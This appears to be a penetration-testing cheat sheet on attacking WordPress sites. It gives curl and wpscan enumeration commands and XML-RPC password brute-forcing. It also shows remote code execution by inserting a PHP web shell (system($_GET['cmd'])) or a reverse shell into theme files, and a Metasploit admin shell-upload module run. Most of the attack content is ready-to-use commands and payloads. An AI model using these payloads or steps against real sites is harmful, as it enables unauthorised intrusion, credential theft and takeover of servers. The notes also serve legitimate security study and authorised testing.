Skip to main content

Wordpress

WordPress is a popular open-source content management system (CMS) that allows users to create and manage websites easily. It powers over 40% of websites on the internet and supports themes, plugins, and custom development. It is widely used for blogs, business sites, e-commerce, and more due to its flexibility and user-friendly interface.

Tech Stack of WordPress

  • Backend: PHP
  • Frontend: HTML, CSS, JavaScript (jQuery, React for Gutenberg editor)
  • Database: MySQL or MariaDB
  • Server: Apache or Nginx

File Structure

/wordpress-root
│── wp-admin/          # Core admin dashboard files  
│── wp-content/        # User-uploaded content (Themes, Plugins, Uploads)  
│   ├── plugins/       # Installed plugins (security risk if outdated)  
│   ├── themes/        # Installed themes (can be exploited if vulnerable)  
│   ├── uploads/       # Media uploads (potential for malicious file uploads)  
│── wp-includes/       # Core WordPress functions and libraries  
│── .htaccess          # Web server configuration (can be exploited for redirections)  
│── index.php          # Main entry point of WordPress  
│── wp-config.php      # Database credentials & security keys (critical target for attackers)  
│── wp-login.php       # WordPress login page (brute-force attack target)  
│── xmlrpc.php         # Used for remote publishing (often abused for DDoS attacks)  
│── readme.html        # Default file exposing version info (can aid attackers)  
│── license.txt        # WordPress license information

Enumeration

## Version Enumeration
## Note: Use Wappalyzer or Look source code.
curl -s https://blog.rezydev.xyz/ | grep '<meta name="generator"'

## older WordPress versions has 'readme.html' which reveals wp-version

## WpEnumX (plugin and theme)
python3 WpEnumX.py --wp-url=https://blog.rezydev.xyz/
# https://github.com/Rezy-Dev/WpEnumX

## If directory Listing is Enabled
curl -s https://blog.rezydev.xyz/wp-content/plugins/plugin-name/ | html2text
## Install
gem install wpscan

## Use wp-scan
wpscan --url http://blog.rezydev.xyz/ --enumerate --api-token <API> --random-user-agent

## Note: we can get api token from https://wpscan.com/api/

Exploitation

## If we know valid username, we could try password bruteforcing with XMLRPC
wpscan --password-attack xmlrpc -t 20 -U admin, jethalal -P passwords.txt --url http://blog.rezydev.xyz/

RCE with Theme Editor (Need Permissions)

The WordPress Theme Editor (Appearance > Theme File Editor) allows modifying PHP files directly from the dashboard. Attackers with admin or compromised credentials can inject malicious PHP code to gain Remote Code Execution (RCE).

Exploitation Steps

  1. Login to WordPress as an admin.

  2. Navigate to Appearance > Theme File Editor.

  3. Edit files like functions.php or 404.php and insert:

    <?php system($_GET['cmd']); ?> ## OR pentestmonkey/php-reverse-shell

  4. Execute commands via:

    http://blog.rezydev.xyz/wp-content/themes/theme-name/404.php?cmd=whoami

    http://blog.rezydev.xyz/wp-content/themes/theme-name/404.php ## just visit if
    ## there is reverse-shell script and catch shell using netcat

Metasploit Theme Editor Hack

Metasploit can exploit the WordPress Theme Editor to inject malicious PHP code and gain Remote Code Execution (RCE). This requires admin credentials or an existing vulnerability that grants access.

msfconsole
use exploit/unix/webapp/wp_admin_shell_upload
set RHOSTS <target-ip>
set USERNAME <admin>
set PASSWORD <password>
set TARGETURI /wordpress  # Adjust if WP is in a subdirectory
exploit ## or 'run'